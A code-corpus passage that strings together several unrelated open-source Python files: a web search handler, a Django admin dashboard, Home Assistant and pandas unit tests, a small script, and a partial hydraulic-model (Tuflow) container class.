(search_nmatches,
searchquery)
)
else:
search_nmatches = len(ftsdict['results']['arxiv_id'])
search_result_info = (
'Found %s total matching '
'items for: <strong>%s</strong>. '
'Showing only the '
'top <span class="nmatches">%s</span> '
'%s '
'results below' %
(all_nmatches,
searchquery,
search_nmatches,
relevance_sticker))
self.render(
"search.html",
user_name=user_name,
local_today=local_today,
flash_message=flash_message,
search_page_title="Search the Astro-Coffee archive",
search_page_type="results",
search_results=search_results,
search_nmatches=search_nmatches,
search_result_info=search_result_info,
new_user=new_user
)
# if the query fails on the backend, return nothing.
except Exception as e:
LOGGER.exception("search backend failed on searchquery: %s"
% searchquery)
search_result_info = ('Sorry, we couldn\'t understand your '
'search query: <strong>%s</strong>' %
searchquery)
search_results = None
search_nmatches = 0
self.render("search.html",
user_name=user_name,
local_today=local_today,
flash_message=flash_message,
search_page_title="Search the Astro-Coffee archive",
search_page_type="results",
search_results=search_results,
search_nmatches=search_nmatches,
search_result_info=search_result_info,
new_user=new_user)
# this is if we don't understand the query
else:
search_result_info = ('Sorry, we couldn\'t understand your '
'search query: <strong>%s</strong>.' %
searchquery)
search_results = None
search_nmatches = 0
self.render("search.html",
user_name=user_name,
local_today=local_today,
flash_message=flash_message,
search_page_title="Search the Astro-Coffee archive",
search_page_type="results",
search_results=search_results,
search_nmatches=search_nmatches,
search_result_info=search_result_info,
new_user=new_user)
| waqasbhatti/astroph-coffee | src/coffeehandlers.py | Python | mit | 91,422 |
"""
This file was generated with the customdashboard management command and
contains the class for the main dashboard.
To activate your index dashboard add the following to your settings.py::
GRAPPELLI_INDEX_DASHBOARD = 'version3.dashboard.CustomIndexDashboard'
"""
from django.utils.translation import ugettext_lazy as _
from django.core.urlresolvers import reverse
from grappelli.dashboard import modules, Dashboard
from grappelli.dashboard.utils import get_admin_site_name
class CustomIndexDashboard(Dashboard):
"""
Custom index dashboard for www.
"""
def init_with_context(self, context):
site_name = get_admin_site_name(context)
# append a group for "Administration" & "Applications"
# self.children.append(modules.Group(
# _('Group: Administration & Applications'),
# column=1,
# collapsible=True,
# children = [
# modules.AppList(
# _('Administration'),
# column=1,
# collapsible=False,
# models=('django.contrib.*',),
# ),
# modules.AppList(
# _('Applications'),
# column=1,
# css_classes=('collapse closed',),
# exclude=('django.contrib.*',),
# )
# ]
# ))
# append an app list module for "Applications"
# self.children.append(modules.AppList(
# _('AppList: Applications'),
# collapsible=True,
# column=1,
# css_classes=('collapse closed',),
# exclude=('django.contrib.*',),
# ))
# append an app list module for "Administration"
# self.children.append(modules.ModelList(
# _('ModelList: Administration'),
# column=1,
# collapsible=False,
# models=('django.contrib.*',),
# ))
# append another link list module for "support".
# self.children.append(modules.LinkList(
# _('Media Management'),
# column=2,
# children=[
# {
# 'title': _('FileBrowser'),
# 'url': '/admin/filebrowser/browse/',
# 'external': False,
# },
# ]
# ))
# append another link list module for "support".
# self.children.append(modules.LinkList(
# _('Support'),
# column=2,
# children=[
# {
# 'title': _('Django Documentation'),
# 'url': 'http://docs.djangoproject.com/',
# 'external': True,
# },
# {
# 'title': _('Grappelli Documentation'),
# 'url': 'http://packages.python.org/django-grappelli/',
# 'external': True,
# },
# {
# 'title': _('Grappelli Google-Code'),
# 'url': 'http://code.google.com/p/django-grappelli/',
# 'external': True,
# },
# ]
# ))
# append a feed module
# self.children.append(modules.Feed(
# _('Latest Django News'),
# column=2,
# feed_url='http://www.djangoproject.com/rss/weblog/',
# limit=5
# ))
# append a recent actions module
# self.children.append(modules.RecentActions(
# _('Recent Actions'),
# limit=5,
# collapsible=False,
# column=3,
# ))
self.children.append(modules.ModelList(
title='Office Files / Parties',
column=1,
models=('bittscmsapp.models.CoreInstruction',
'bittscmsapp.models.CoreParty',)
))
self.children.append(modules.ModelList(
title='Lookup Values',
collapsible=True,
column=2,
models=()
))
| bittssystem/version3 | dashboard.py | Python | mit | 4,121 |
"""Test event helpers."""
# pylint: disable=protected-access,too-many-public-methods
# pylint: disable=too-few-public-methods
import unittest
from datetime import datetime, timedelta
from astral import Astral
from homeassistant.bootstrap import setup_component
import homeassistant.core as ha
from homeassistant.const import MATCH_ALL
from homeassistant.helpers.event import (
track_point_in_utc_time,
track_point_in_time,
track_utc_time_change,
track_time_change,
track_state_change,
track_sunrise,
track_sunset,
)
from homeassistant.components import sun
import homeassistant.util.dt as dt_util
from tests.common import get_test_home_assistant
class TestEventHelpers(unittest.TestCase):
"""Test the Home Assistant event helpers."""
def setUp(self): # pylint: disable=invalid-name
"""Setup things to be run when tests are started."""
self.hass = get_test_home_assistant()
def tearDown(self): # pylint: disable=invalid-name
"""Stop everything that was started."""
self.hass.stop()
def test_track_point_in_time(self):
"""Test track point in time."""
before_birthday = datetime(1985, 7, 9, 12, 0, 0, tzinfo=dt_util.UTC)
birthday_paulus = datetime(1986, 7, 9, 12, 0, 0, tzinfo=dt_util.UTC)
after_birthday = datetime(1987, 7, 9, 12, 0, 0, tzinfo=dt_util.UTC)
runs = []
track_point_in_utc_time(
self.hass, lambda x: runs.append(1), birthday_paulus)
self._send_time_changed(before_birthday)
self.hass.block_till_done()
self.assertEqual(0, len(runs))
self._send_time_changed(birthday_paulus)
self.hass.block_till_done()
self.assertEqual(1, len(runs))
# A point in time tracker will only fire once, this should do nothing
self._send_time_changed(birthday_paulus)
self.hass.block_till_done()
self.assertEqual(1, len(runs))
track_point_in_time(
self.hass, lambda x: runs.append(1), birthday_paulus)
self._send_time_changed(after_birthday)
self.hass.block_till_done()
self.assertEqual(2, len(runs))
unsub = track_point_in_time(
self.hass, lambda x: runs.append(1), birthday_paulus)
unsub()
self._send_time_changed(after_birthday)
self.hass.block_till_done()
self.assertEqual(2, len(runs))
def test_track_time_change(self):
"""Test tracking time change."""
wildcard_runs = []
specific_runs = []
unsub = track_time_change(self.hass, lambda x: wildcard_runs.append(1))
unsub_utc = track_utc_time_change(
self.hass, lambda x: specific_runs.append(1), second=[0, 30])
self._send_time_changed(datetime(2014, 5, 24, 12, 0, 0))
self.hass.block_till_done()
self.assertEqual(1, len(specific_runs))
self.assertEqual(1, len(wildcard_runs))
self._send_time_changed(datetime(2014, 5, 24, 12, 0, 15))
self.hass.block_till_done()
self.assertEqual(1, len(specific_runs))
self.assertEqual(2, len(wildcard_runs))
self._send_time_changed(datetime(2014, 5, 24, 12, 0, 30))
self.hass.block_till_done()
self.assertEqual(2, len(specific_runs))
self.assertEqual(3, len(wildcard_runs))
unsub()
unsub_utc()
self._send_time_changed(datetime(2014, 5, 24, 12, 0, 30))
self.hass.block_till_done()
self.assertEqual(2, len(specific_runs))
self.assertEqual(3, len(wildcard_runs))
def test_track_state_change(self):
"""Test track_state_change."""
# 2 lists to track how often our callbacks get called
specific_runs = []
wildcard_runs = []
wildercard_runs = []
track_state_change(
self.hass, 'light.Bowl', lambda a, b, c: specific_runs.append(1),
'on', 'off')
track_state_change(
self.hass, 'light.Bowl',
lambda _, old_s, new_s: wildcard_runs.append((old_s, new_s)))
track_state_change(
self.hass, MATCH_ALL,
lambda _, old_s, new_s: wildercard_runs.append((old_s, new_s)))
# Adding state to state machine
self.hass.states.set("light.Bowl", "on")
self.hass.block_till_done()
self.assertEqual(0, len(specific_runs))
self.assertEqual(1, len(wildcard_runs))
self.assertEqual(1, len(wildercard_runs))
self.assertIsNone(wildcard_runs[-1][0])
self.assertIsNotNone(wildcard_runs[-1][1])
# Set same state should not trigger a state change/listener
self.hass.states.set('light.Bowl', 'on')
self.hass.block_till_done()
self.assertEqual(0, len(specific_runs))
self.assertEqual(1, len(wildcard_runs))
self.assertEqual(1, len(wildercard_runs))
# State change off -> on
self.hass.states.set('light.Bowl', 'off')
self.hass.block_till_done()
self.assertEqual(1, len(specific_runs))
self.assertEqual(2, len(wildcard_runs))
self.assertEqual(2, len(wildercard_runs))
# State change off -> off
self.hass.states.set('light.Bowl', 'off', {"some_attr": 1})
self.hass.block_till_done()
self.assertEqual(1, len(specific_runs))
self.assertEqual(3, len(wildcard_runs))
self.assertEqual(3, len(wildercard_runs))
# State change off -> on
self.hass.states.set('light.Bowl', 'on')
self.hass.block_till_done()
self.assertEqual(1, len(specific_runs))
self.assertEqual(4, len(wildcard_runs))
self.assertEqual(4, len(wildercard_runs))
self.hass.states.remove('light.bowl')
self.hass.block_till_done()
self.assertEqual(1, len(specific_runs))
self.assertEqual(5, len(wildcard_runs))
self.assertEqual(5, len(wildercard_runs))
self.assertIsNotNone(wildcard_runs[-1][0])
self.assertIsNone(wildcard_runs[-1][1])
self.assertIsNotNone(wildercard_runs[-1][0])
self.assertIsNone(wildercard_runs[-1][1])
# Set state for different entity id
self.hass.states.set('switch.kitchen', 'on')
self.hass.block_till_done()
self.assertEqual(1, len(specific_runs))
self.assertEqual(5, len(wildcard_runs))
self.assertEqual(6, len(wildercard_runs))
def test_track_sunrise(self):
"""Test track the sunrise."""
latitude = 32.87336
longitude = 117.22743
# Setup sun component
self.hass.config.latitude = latitude
self.hass.config.longitude = longitude
setup_component(self.hass, sun.DOMAIN, {
sun.DOMAIN: {sun.CONF_ELEVATION: 0}})
# Get next sunrise/sunset
astral = Astral()
utc_now = dt_util.utcnow()
mod = -1
while True:
next_rising = (astral.sunrise_utc(utc_now +
timedelta(days=mod), latitude, longitude))
if next_rising > utc_now:
break
mod += 1
# Track sunrise
runs = []
unsub = track_sunrise(self.hass, lambda: runs.append(1))
offset_runs = []
offset = timedelta(minutes=30)
unsub2 = track_sunrise(self.hass, lambda: offset_runs.append(1),
offset)
# run tests
self._send_time_changed(next_rising - offset)
self.hass.block_till_done()
self.assertEqual(0, len(runs))
self.assertEqual(0, len(offset_runs))
self._send_time_changed(next_rising)
self.hass.block_till_done()
self.assertEqual(1, len(runs))
self.assertEqual(0, len(offset_runs))
self._send_time_changed(next_rising + offset)
self.hass.block_till_done()
self.assertEqual(2, len(runs))
self.assertEqual(1, len(offset_runs))
unsub()
unsub2()
self._send_time_changed(next_rising + offset)
self.hass.block_till_done()
self.assertEqual(2, len(runs))
self.assertEqual(1, len(offset_runs))
def test_track_sunset(self):
"""Test track the sunset."""
latitude = 32.87336
longitude = 117.22743
# Setup sun component
self.hass.config.latitude = latitude
self.hass.config.longitude = longitude
setup_component(self.hass, sun.DOMAIN, {
sun.DOMAIN: {sun.CONF_ELEVATION: 0}})
# Get next sunrise/sunset
astral = Astral()
utc_now = dt_util.utcnow()
mod = -1
while True:
next_setting = (astral.sunset_utc(utc_now +
timedelta(days=mod), latitude, longitude))
if next_setting > utc_now:
break
mod += 1
# Track sunset
runs = []
unsub = track_sunset(self.hass, lambda: runs.append(1))
offset_runs = []
offset = timedelta(minutes=30)
unsub2 = track_sunset(self.hass, lambda: offset_runs.append(1), offset)
# Run tests
self._send_time_changed(next_setting - offset)
self.hass.block_till_done()
self.assertEqual(0, len(runs))
self.assertEqual(0, len(offset_runs))
self._send_time_changed(next_setting)
self.hass.block_till_done()
self.assertEqual(1, len(runs))
self.assertEqual(0, len(offset_runs))
self._send_time_changed(next_setting + offset)
self.hass.block_till_done()
self.assertEqual(2, len(runs))
self.assertEqual(1, len(offset_runs))
unsub()
unsub2()
self._send_time_changed(next_setting + offset)
self.hass.block_till_done()
self.assertEqual(2, len(runs))
self.assertEqual(1, len(offset_runs))
def _send_time_changed(self, now):
"""Send a time changed event."""
self.hass.bus.fire(ha.EVENT_TIME_CHANGED, {ha.ATTR_NOW: now})
def test_periodic_task_minute(self):
"""Test periodic tasks per minute."""
specific_runs = []
unsub = track_utc_time_change(
self.hass, lambda x: specific_runs.append(1), minute='/5')
self._send_time_changed(datetime(2014, 5, 24, 12, 0, 0))
self.hass.block_till_done()
self.assertEqual(1, len(specific_runs))
self._send_time_changed(datetime(2014, 5, 24, 12, 3, 0))
self.hass.block_till_done()
self.assertEqual(1, len(specific_runs))
self._send_time_changed(datetime(2014, 5, 24, 12, 5, 0))
self.hass.block_till_done()
self.assertEqual(2, len(specific_runs))
unsub()
self._send_time_changed(datetime(2014, 5, 24, 12, 5, 0))
self.hass.block_till_done()
self.assertEqual(2, len(specific_runs))
def test_periodic_task_hour(self):
"""Test periodic tasks per hour."""
specific_runs = []
unsub = track_utc_time_change(
self.hass, lambda x: specific_runs.append(1), hour='/2')
self._send_time_changed(datetime(2014, 5, 24, 22, 0, 0))
self.hass.block_till_done()
self.assertEqual(1, len(specific_runs))
self._send_time_changed(datetime(2014, 5, 24, 23, 0, 0))
self.hass.block_till_done()
self.assertEqual(1, len(specific_runs))
self._send_time_changed(datetime(2014, 5, 24, 0, 0, 0))
self.hass.block_till_done()
self.assertEqual(2, len(specific_runs))
self._send_time_changed(datetime(2014, 5, 25, 1, 0, 0))
self.hass.block_till_done()
self.assertEqual(2, len(specific_runs))
self._send_time_changed(datetime(2014, 5, 25, 2, 0, 0))
self.hass.block_till_done()
self.assertEqual(3, len(specific_runs))
unsub()
self._send_time_changed(datetime(2014, 5, 25, 2, 0, 0))
self.hass.block_till_done()
self.assertEqual(3, len(specific_runs))
def test_periodic_task_day(self):
"""Test periodic tasks per day."""
specific_runs = []
unsub = track_utc_time_change(
self.hass, lambda x: specific_runs.append(1), day='/2')
self._send_time_changed(datetime(2014, 5, 2, 0, 0, 0))
self.hass.block_till_done()
self.assertEqual(1, len(specific_runs))
self._send_time_changed(datetime(2014, 5, 3, 12, 0, 0))
self.hass.block_till_done()
self.assertEqual(1, len(specific_runs))
self._send_time_changed(datetime(2014, 5, 4, 0, 0, 0))
self.hass.block_till_done()
self.assertEqual(2, len(specific_runs))
unsub()
self._send_time_changed(datetime(2014, 5, 4, 0, 0, 0))
self.hass.block_till_done()
self.assertEqual(2, len(specific_runs))
def test_periodic_task_year(self):
"""Test periodic tasks per year."""
specific_runs = []
unsub = track_utc_time_change(
self.hass, lambda x: specific_runs.append(1), year='/2')
self._send_time_changed(datetime(2014, 5, 2, 0, 0, 0))
self.hass.block_till_done()
self.assertEqual(1, len(specific_runs))
self._send_time_changed(datetime(2015, 5, 2, 0, 0, 0))
self.hass.block_till_done()
self.assertEqual(1, len(specific_runs))
self._send_time_changed(datetime(2016, 5, 2, 0, 0, 0))
self.hass.block_till_done()
self.assertEqual(2, len(specific_runs))
unsub()
self._send_time_changed(datetime(2016, 5, 2, 0, 0, 0))
self.hass.block_till_done()
self.assertEqual(2, len(specific_runs))
def test_periodic_task_wrong_input(self):
"""Test periodic tasks with wrong input."""
specific_runs = []
track_utc_time_change(
self.hass, lambda x: specific_runs.append(1), year='/two')
self._send_time_changed(datetime(2014, 5, 2, 0, 0, 0))
self.hass.block_till_done()
self.assertEqual(0, len(specific_runs))
| leoc/home-assistant | tests/helpers/test_event.py | Python | mit | 13,995 |
"""
.. moduleauthor:: Chris Dusold <[email protected]>
A module containing general purpose, cross instance hashing.
This module intends to make storage and cache checking stable accross instances.
"""
from drivelink.hash._hasher import hash
from drivelink.hash._hasher import frozen_hash
from drivelink.hash._hasher import Deterministic_Hashable
| cdusold/DriveLink | drivelink/hash/__init__.py | Python | mit | 357 |
from unittest import TestCase
import pandas as pd
import pandas.util.testing as tm
import numpy as np
import trtools.core.topper as topper
import imp
imp.reload(topper)
arr = np.random.randn(10000)
s = pd.Series(arr)
df = tm.makeDataFrame()
class TestTopper(TestCase):
def __init__(self, *args, **kwargs):
TestCase.__init__(self, *args, **kwargs)
def runTest(self):
pass
def setUp(self):
pass
def test_topn_largest(self):
# get the n largest
bn_res = topper.bn_topn(arr, 10)
assert bn_res[0] == max(arr) # sanity check
pd_res = s.order(ascending=False)[:10]
np.testing.assert_almost_equal(bn_res, pd_res)
# change result to biggest to smallest
bn_res = topper.bn_topn(arr, 10, ascending=True)
assert bn_res[-1] == max(arr) # sanity check
pd_res = s.order(ascending=True)[-10:] # grab from end since we reversed
np.testing.assert_almost_equal(bn_res, pd_res)
def test_topn_big_N(self):
"""
When calling topn where N is greater than the number of non-nan values.
This can happen if you're tracking a Frame of returns where not all series start at the same time.
It's possible that in the begining or end, or anytime for that matter, you might not have enough
values. This screws up the logic.
"""
# test data
arr = np.random.randn(100)
arr[5:] = np.nan # only first four are non-na
s = pd.Series(arr)
# top
bn_res = topper.bn_topn(arr, 10)
assert bn_res[0] == max(arr) # sanity check
pd_res = s.order(ascending=False)[:10].dropna()
tm.assert_almost_equal(bn_res, pd_res.values)
# bottom
bn_res = topper.bn_topn(arr, -10)
assert bn_res[0] == min(arr) # sanity check
pd_res = s.order()[:10].dropna() # grab from end since we reversed
tm.assert_almost_equal(bn_res, pd_res.values)
def test_top_smallest(self):
# get the nsmallest
bn_res = topper.bn_topn(arr, -10)
assert bn_res[0] == min(arr) # sanity check
pd_res = s.order()[:10]
tm.assert_almost_equal(bn_res, pd_res.values)
# change ordering
bn_res = topper.bn_topn(arr, -10, ascending=False)
assert bn_res[-1] == min(arr) # sanity check
pd_res = s.order(ascending=False)[-10:] # grab from end since we reversed
tm.assert_almost_equal(bn_res, pd_res.values)
def test_top_arg(self):
# get the nlargest
bn_res = topper.bn_topn(arr, 10)
bn_args = topper.bn_topargn(arr, 10)
arg_res = arr[bn_args]
tm.assert_almost_equal(bn_res, arg_res)
# get the nsmallest
bn_res = topper.bn_topn(arr, -10)
bn_args = topper.bn_topargn(arr, -10)
arg_res = arr[bn_args]
tm.assert_almost_equal(bn_res, arg_res)
# get the nsmallest
bn_res = topper.bn_topn(arr, -10, ascending=False)
bn_args = topper.bn_topargn(arr, -10, ascending=False)
arg_res = arr[bn_args]
tm.assert_almost_equal(bn_res, arg_res)
def test_nans(self):
"""
bottleneck.partsort doesn't handle nans. We need to correct for them.
the arg version is trickiers since we need to make sure to
translate back into the nan-filled array
"""
nanarr = np.arange(10).astype(float)
nanarr[nanarr % 2 == 0] = np.nan
test = topper.topn(nanarr, 3)
correct = [9,7,5]
tm.assert_almost_equal(test, correct)
test = topper.topn(nanarr, -3)
correct = [1,3,5]
tm.assert_almost_equal(test, correct)
test = topper.topargn(nanarr, 3)
correct = [9,7,5]
tm.assert_almost_equal(test, correct)
test = topper.topargn(nanarr, -3)
correct = [1,3,5]
tm.assert_almost_equal(test, correct)
test = topper.topargn(nanarr, -3, ascending=False)
correct = [5,3,1]
tm.assert_almost_equal(test, correct)
def test_df_topn(self):
# long way of getting the topn
tops = df.apply(lambda s: s.topn(2, ascending=False), axis=1)
correct = pd.DataFrame(tops, index=df.index)
test = topper.topn_df(df, 2, ascending=False)
tm.assert_frame_equal(test, correct)
# sanity check, make sure first value is right
c = df.iloc[0].order()[-1]
t = test.iloc[0][0]
tm.assert_almost_equal(t, c)
# bottom 2
tops = df.apply(lambda s: s.topn(-2), axis=1)
correct = pd.DataFrame(tops, index=df.index)
test = topper.topn_df(df, -2)
tm.assert_frame_equal(test, correct)
# sanity check, make sure first value is right
c = df.iloc[0].order()[0]
t = test.iloc[0][0]
tm.assert_almost_equal(t, c)
def test_df_topindexn(self):
# long way of getting the topindexn
top_pos = df.apply(lambda s: s.topargn(2, ascending=False), axis=1)
correct = df.columns[top_pos.values]
correct = pd.DataFrame(correct, index=df.index)
test = topper.topindexn_df(df, 2, ascending=False)
tm.assert_frame_equal(test, correct)
# sanity check, make sure first value is right
c = df.iloc[0].order().index[-1]
t = test.iloc[0][0]
tm.assert_almost_equal(t, c)
# bottom 2
top_pos = df.apply(lambda s: s.topargn(-2), axis=1)
correct = df.columns[top_pos.values]
correct = pd.DataFrame(correct, index=df.index)
test = topper.topindexn_df(df, -2)
tm.assert_frame_equal(test, correct)
# sanity check, make sure first value is right
c = df.iloc[0].order().index[0]
t = test.iloc[0][0]
tm.assert_frame_equal(test, correct)
def test_df_topargn(self):
# really this is tested via topindexn indirectly
pass
def test_default_ascending(self):
"""
Changed ascending to change based on N
More intuitive, by default you'd expect the greatest or lowest
value would be first, depending on which side you are looking for
"""
# top should default to asc=False
bn_res = topper.bn_topn(arr, 10)
pd_res = s.order(ascending=False)[:10]
tm.assert_almost_equal(bn_res, pd_res.values)
# make sure ascending is still respected
bn_res = topper.bn_topn(arr, 10, ascending=True)
pd_res = s.order(ascending=True)[-10:]
tm.assert_almost_equal(bn_res, pd_res.values)
# bottom defaults asc=True
bn_res = topper.bn_topn(arr, -10)
pd_res = s.order()[:10]
tm.assert_almost_equal(bn_res, pd_res.values)
# make sure ascending is still respected
bn_res = topper.bn_topn(arr, -10, ascending=False)
pd_res = s.order()[:10][::-1]
tm.assert_almost_equal(bn_res, pd_res.values)
def test_test_ndim(self):
"""
Make sure topn and topargn doesn't accept DataFrame
"""
try:
topper.topn(df, 1)
except:
pass
else:
assert False
try:
topper.topargn(df, 1)
except:
pass
else:
assert False
def test_too_big_n_df(self):
df = pd.DataFrame(np.random.randn(100, 10))
df[df > 0] = np.nan
testdf = topper.topn_df(df, 10)
for x in range(len(df)):
correct = df.iloc[x].order(ascending=False).reset_index(drop=True)
test = testdf.iloc[x]
tm.assert_almost_equal(test, correct)
testdf = topper.topn_df(df, 2)
for x in range(len(df)):
correct = df.iloc[x].order(ascending=False).reset_index(drop=True)[:2]
test = testdf.iloc[x]
tm.assert_almost_equal(test, correct)
# bottom
testdf = topper.topn_df(df, -2)
for x in range(len(df)):
correct = df.iloc[x].order().reset_index(drop=True)[:2]
test = testdf.iloc[x]
tm.assert_almost_equal(test, correct)
# bottom
testdf = topper.topn_df(df, -20)
for x in range(len(df)):
correct = df.iloc[x].order().reset_index(drop=True)[:20]
test = testdf.iloc[x]
tm.assert_almost_equal(test, correct)
if __name__ == '__main__':
import nose
nose.runmodule(argv=[__file__,'-vvs','-x','--pdb', '--pdb-failure'],exit=False)
| dalejung/trtools | trtools/core/tests/test_topper.py | Python | mit | 8,499 |
import sys
def main():
with open(sys.argv[1]) as input_file:
for line in input_file.readlines():
input_list = list(reversed(line.strip().split(' ')))
index = int(input_list[0])
del input_list[0]
print(input_list[index - 1])
if __name__ == '__main__':
main()
| leaen/Codeeval-solutions | mth-to-last-element.py | Python | mit | 325 |
"""
Summary:
Container and main interface for accessing the Tuflow model and a class
for containing the main tuflow model files (Tcf, Tgc, etc).
There are several other classes in here that are used to determine the
order of the files in the model and key words for reading in the files.
Author:
Duncan Runnacles
Created:
01 Apr 2016
Copyright:
Duncan Runnacles 2016
TODO:
Updates:
"""
from __future__ import unicode_literals
from itertools import chain
from ship.tuflow.tuflowfilepart import TuflowFile, TuflowKeyValue, TuflowUserVariable, TuflowModelVariable
from ship.tuflow import FILEPART_TYPES as fpt
from ship.utils import utilfunctions as uf
import logging
logger = logging.getLogger(__name__)
"""logging references with a __name__ set to this module."""
class TuflowModel(object):
"""Container for the entire loaded tuflow model.
"""
def __init__(self, root):
"""Initialise constants and dictionaries.
"""
self.control_files = {}
"""Tuflow Control File objects.
All types of Tuflow Control file are stored here under the type header.
Types are: TCF, TGC, TBC, ECF, TEF.
TCF is slightly different to the others as it contains an additional
member variable 'main_file_hash' to identify the main tcf file that
was called to load the model.
"""
self._root = ''
"""The current directory path used to reach the run files in the model"""
self.missing_model_files = []
"""Contains any tcf, tgs, etc files that could not be loaded."""
self.bc_event = {}
"""Contains the currently acitve BC Event variables."""
self.user_variables = None
"""Class containing the scenario/event/variable keys and values."""
@property
def root(self):
return self._root
@root.setter
def root(self, value):
self._root = value
self.updateRoot(value)
def checkPathsExist(self):
"""Test that all of the filepaths in the TuflowModel exist."""
failed = []
for file_type, file in self.control_files.items():
failed.extend(file.checkPathsExist())
return failed
def updateRoot(self, root):
"""Update the root variable in all TuflowFile's in the model.
The root variable (TuflowModel.root) is the directory that the main
.tcf file is in. This is used to define the location of all other files
which are usually referenced relative to each other.
Note:
This method will be called automatically when setting the
TuflowModel.root variable.
Args:
root(str): the new root to set.
"""
for c in self.control_files.values():
c.updateRoot(root)
def customPartSearch(self, control_callback, tuflow_callback=None,
include_unknown=False):
"""Return TuflowPart's based on the return value of the callbacks.
control_callback will be used as an argument in each of
self.control_files' customPartSearch() methods. The tuflow_callback
will be called on the combined generators returned from that method.
See Also:
ControlFile.customPartSearch
Continuing the example in the ControlFile.customPartSearch method. This
time the additinal tuflow_callback function is defined as well.
callback_func must accept a TuflowPart and return a tuple of:
keep-status and the return value. For example::
# This is the callback_func that we test the TuflowPart. It is
# defined in your script
def callback_func(part):
# In this case we check for GIS parts and return a tuple of:
# - bool(keep-status): True if it is a GIS filepart_type
# - tuple: filename and parent.model_type. This can be
# whatever you want though
if part.filepart_type == fpt.GIS:
return True, (part.filename, part.associates.parent.model_type)
# Any TuflowPart's that you don't want included must return
# a tuple of (False, None)
else:
return False, None
# Here we define a function to run after the generators are returned
# from callback_func. In the funcion above the return type is a
# tuple, so we accept that as the arg in this function, but it will
# be whatever you return from callback_func above.
# This function checks to see if there are any duplicate filename's.
# Note that it must return the same tuple as the other callback.
# i.e. keep-status, result
def tuflow_callback(part_tuple):
found = []
if part_tuple[0] in found:
return False, None
else:
return True, part_tuple[0]
# Both callback's given this time
results = tuflow.customPartSearch(callback,
tuflow_callback=tuflowCallback)
# You can now iteratre the results
for r in results:
print (str(r))
Args:
callback_func(func): a function to run for each TuflowPart in
this ControlFile's PartHolder.
include_unknown=False(bool): If False any UnknownPart's will be
ignored. If set to True it is the resonsibility of the
callback_func to check for this and deal with it.
Return:
generator - containing the results of the search.
"""
gens = []
for c in self.control_files.values():
gens.append(
c.customPartSearch(control_callback, include_unknown)
)
all_gens = chain(gens[0:-1])
for a in all_gens:
for val in a:
if tuflow_callback:
take, value = tuflow_callback(val)
if take:
yield[value]
else:
yield [val]
def removeTcfModelFile(self, model_file):
"""Remove an existing ModelFile from 'TCF' and update ControlFile.
Note:
You can call this function directly if you want to, but it is also
hooked into a callback in the TCF ControlFile. This means that when
you use the standard ControlFile add/remove/replaceControlFile()
methods these will be called automatically.
Args:
model_files(ModelFile): the ModelFile being removed.
"""
if not model_file in self.control_files[model_file.model_type].control_files:
raise AttributeError("model_file doesn't exists in %s control_files" % model_file.model_type)
self.control_files[model_file.model_type].removeControlFile(model_file)
self.control_files['TCF'].parts.remove(model_file)
def replaceTcfModelFile(self, model_file, control_file, replace_file):
"""Replace an existing ModelFile in 'TCF' and update ControlFile.
Note:
You can call this function directly if you want to, but it is also
hooked into a callback in the TCF ControlFile. This means that when
you use the standard ControlFile add/remove/replaceControlFile()
methods these will be called automatically.
Args:
model_file(ModelFile): the replacement TuflowPart.
control_file(ControlFile): containing the contents to replace the
existing ControlFile.
replace_file(ModelFile): the TuflowPart to be replaced.
"""
if model_file in self.control_files[model_file.model_type].control_files:
raise AttributeError('model_file already exists in this ControlFile')
self.control_files[replace_file.model_type].replaceControlFile(
model_file, control_file, replace_file)
self.control_files['TCF'].parts.replace(model_file, replace_file)
def addTcfModelFile(self, model_file, control_file, **kwargs):
"""Add a new ModelFile instance to a TCF type ControlFile.
Note:
You can call this function directly if you want to, but it is also
hooked into a callback in the TCF ControlFile. This means that when
you use the standard ControlFile add/remove/replaceControlFile()
methods these will be called automatically.
**kwargs:
after(TuflowPart): the part to add the new ModelFile after.
before(TuflowPart): the part to add the new ModelFile before.
Either after or before kwargs must be given. If both are provided after
will take precedence.
Args:
model_file(ModelFile): the replacement ModelFile TuflowPart.
control_file(ControlFile): containing the contents to replace the
existing ControlFile.
"""
if not 'after' in kwargs.keys() and not 'before' in kwargs.keys():
raise AttributeError("Either 'before' or 'after' TuflowPart kwarg must be given")
if model_file in self.control_files[model_file.model_type].control_files:
raise AttributeError('model_file already exists in this ControlFile')
self.control_files[model_file.model_type].addControlFile(
model_file, control_file, **kwargs)
self.control_files['TCF'].parts.add(model_file, **kwargs)
# class TuflowUtils(object):
# """Utility functions for dealing with TuflowModel outputs."""
#
# def __init__(self):
# pass
#
# @staticmethod
# def resultsByParent(results):
# """
# """
class UserVariables(object):
"""Container for all user defined variables.
Includes variable set in the control files with 'Set somevar ==' and the
scenario and event variables.
Note:
Only the currently active scenario and event variables will be stored
in this class.
"""
def __init__(self):
self.variable = {}
self.scenario = {}
self.event = {}
self._names = []
self.has_cmd_args = False
def add(self, filepart, vtype=None):
"""Add a new variables to the class.
Args:
filepart(TuflowModelVariables or TuflowUserVariable):
Raises:
TypeError - if filepart is not a TuflowModelVariable or TuflowUserVariable.
ValueError - if filepart already exists.
"""
if filepart._variable_name in self._names:
raise ValueError('variable already exists with that name - use replace instead')
if isinstance(filepart, TuflowUserVariable):
self.variable[filepart.variable_name] = filepart
self._names.append(filepart.variable_name)
elif isinstance(filepart, TuflowModelVariable):
if filepart._variable_type == 'scenario':
if filepart._variable_name == 's1' or filepart._variable_name == 's':
if 's' in self._names or 's1' in self._names:
raise ValueError("variable already exists with that " +
"name - use replace instead\n" +
"note 's' and 's1' are treated the same.")
self.scenario[filepart._variable_name] = filepart
self.variable[filepart._variable_name] = filepart
self._names.append(filepart.variable_name)
else:
if filepart._variable_name == 'e1' or filepart._variable_name == 'e':
if 'e' in self._names or 'e1' in self._names:
raise ValueError("variable already exists with that " +
"name - use replace instead\n" +
"note 'e' and 'e1' are treated the same.")
self.event[filepart._variable_name] = filepart
self.variable[filepart._variable_name] = filepart
self._names.append(filepart.variable_name)
else:
raise TypeError('filepart must be of type TuflowUserVariable or TuflowModelVariable')
def replace(self, filepart):
"""Replace an existing variable.
Args:
filepart(TuflowModelVariables or TuflowUserVariable):
Raises:
TypeError - if filepart is not a TuflowModelVariable or TuflowUserVariable.
ValueError - if filepart doesn't already exist.
"""
# Make sure it actually already exists.
# s & s1 and e & e1 are treated as the same name - same as tuflow
temp_name = filepart._variable_name
if temp_name == 's' or temp_name == 's1':
if not 's' in self._names and not 's1' in self._names:
raise ValueError("filepart doesn't seem to exist in UserVariables.")
elif temp_name == 'e' or temp_name == 'e1':
if not 'e' in self._names and not 'e1' in self._names:
raise ValueError("filepart doesn't seem to exist in UserVariables.")
elif not filepart._variable_name in self._names:
